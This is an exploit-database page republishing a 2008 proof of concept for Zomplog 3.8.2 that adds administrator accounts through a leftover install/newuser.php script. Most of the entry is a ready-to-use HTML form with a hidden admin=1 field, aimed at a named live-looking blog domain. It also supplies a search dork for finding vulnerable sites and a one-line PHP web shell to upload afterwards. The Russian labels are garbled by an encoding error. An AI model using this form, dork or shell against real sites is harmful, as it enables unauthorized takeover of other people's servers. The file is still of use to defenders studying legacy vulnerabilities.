Zomplog 3.8.2 - exploit.company

vendor:

Zomplog

by:

ArxWolf

7.5

CVSS

HIGH

Privilege Escalation

264

CWE

Product Name: Zomplog

Affected Version From: 3.8.2002

Affected Version To: All

Patch Exists: NO

Related CWE: N/A

CPE: a:zomp:zomplog

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

Zomplog 3.8.2 <= add admin

Vulnerability to install/newuser.php, to add 2 administrator. Folder install not removed in 70% of cases.

Mitigation:

Remove the install folder after installation.

Source

Exploit-DB raw data:

======================== WEBXAKEP.NET ===========================

Name:  "Zomplog 3.8.2 <= add admin"
Version: All
Script Download: http://www.zomp.nl/zomplog/
DORK: "powered by zomplog"
Discovered By: ArxWolf
Discovered On: 16 05 2008
WWW: http://WebXakep.net
ICQ: 504-282

Vulnerability to "install/newuser.php", to add 2 administrator.
Folder "install" not removed in 70% of cases.

Exploit:
--------------------------------------------------------
<br><b><center>Ð”Ð¾Ð±Ð°Ð²Ð»ÑÐµÐ¼ Ð°Ð´Ð¼Ð¸Ð½Ð° "Add Admin"</center></b><br><br>
<!-- <form action="http://localhost/install/newuser.php" method="POST"> /-->
<form action="http://weblog.sgrim.us/install/newuser.php" method="POST">
<p>Ð¢Ð¸Ñ‚Ð»Ñ‹ Ð±Ð»Ð¾Ð³Ð° "Blog Title"<br />
  <input type="text" name="weblog_title" maxlength="40" id="blogname" />
  <br />
  <br />
Ð›Ð¾Ð³Ð¸Ð½ "Username"<br />
<input type="text" name="login" maxlength="15" id="name" />
<br />
<br />
ÐŸÐ°Ñ€Ð¾Ð»ÑŒ "Password"<br />
<input type="password" name="password" maxlength="15" id="pwd" />
<br />
<br />
ÐŸÐ¾Ð²Ñ‚Ð¾Ñ€ÑÐµÐ¼ Ð¿Ð°Ñ€Ð¾Ð»ÑŒ "Confirm password"<br />
<input type="password" name="password2" maxlength="15" id="pwd2" />
<br />
<br />
<input name="admin" type="hidden" id="admin" value="1" />
<input name="submit_user" type="submit" value="Submit &rsaquo;&rsaquo;" id="submit" />

</p>
</form>
-------------------------------------------------------------

http://******/admin/profile.php // Add or delete user ^_^
http://******/admin/themes.php //  If there is a right of entry you can fill shell. <?php copy($_GET['i'],$_GET['o']); ?>


========================= WEBXAKEP.NET ===========================

# milw0rm.com [2008-05-16]